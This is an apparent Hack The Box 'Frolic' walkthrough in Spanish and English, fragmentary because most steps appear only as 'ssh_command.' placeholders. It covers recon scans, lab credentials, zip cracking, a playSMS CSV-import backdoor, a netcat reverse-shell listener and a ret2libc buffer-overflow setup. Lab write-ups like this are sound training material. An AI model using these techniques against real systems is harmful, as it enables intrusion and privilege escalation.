Frolic

Frolic


HTB Linux

echo “10.129.1.92 frolic.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.92 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA blocky 10.129.1.92

nmap -sU -O -p- -oA blocky-udp 10.129.1.92

nikto -h 10.129.1.92:80

curl 10.129.1.92:9999/dev/backup/ /playsms

ssh_command.

ssh_command.

http://10.129.1.92:1880

ssh_command.

http://10.129.1.92:9999

ssh_command.

gobuster dir -k -u http://10.129.1.92:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

http://10.129.1.92:9999/admin

ssh_command.

Vemos en javascript la credencial: superduperlooperpassword_lol

ssh_command.

http://10.129.1.92:9999/admin/success.html

ssh_command.

Esto en verdad es un tipo de lenguajes esotericos: Ook!

Podemos usar la siguiente pagina para decodificar dcode.fr to find the plaintext. https://github.com/umbrant/pooky

ssh_command.

Nothing here check /asdiSIAJJ0QWE9JAS El sitio contiene un tipo de codigo en texto

ssh_command.

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl 10.10.10.111:9999/backup/password.txt

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip

file index.php.zip mv index.php.zip out.zip fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip

ssh_command.

cat index.php | xxd -r -p Use xxd to read that back to bytes, which happens to be not only ASCII, but base64 characters:

cat index.php | xxd -r -p | tr -d ‘\r\n’ | base64 -d

https://copy.sh/brainfuck/

ssh_command.

ssh_command.

ssh_command.

admin idkwhatispass

ssh_command.

https://www.exploit-db.com/exploits/42044/

ssh_command.

Creamos un archivo backdoor.csv

ssh_command.

Importamos el backdoor.csv

ssh_command.

Cambiamos el user agent a

ssh_command.

Hacemos un reverse shell a nuestra maquina

ssh_command.

nc -lvnp 443

ssh_command.

python3 http.server 8080

wget http://frolic.htb:8080/rop

ssh_command.

chmod +x rop

gdb rop

gef r $(python -c ‘print “A”*500’)

ssh_command.

Vemos el resultado en gef

ssh_command.

pattern create 100

ssh_command.

patter offset $eip

ssh_command.

uname -a

cat /proc/sys/kernel/randomize_va_space

ssh_command.

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E ” sytem@@| exit@@”

ssh_command.

Creamos el siguiente script en python

ssh_command.

./exploit.py

ssh_command.

© 2025 Cu3rv0x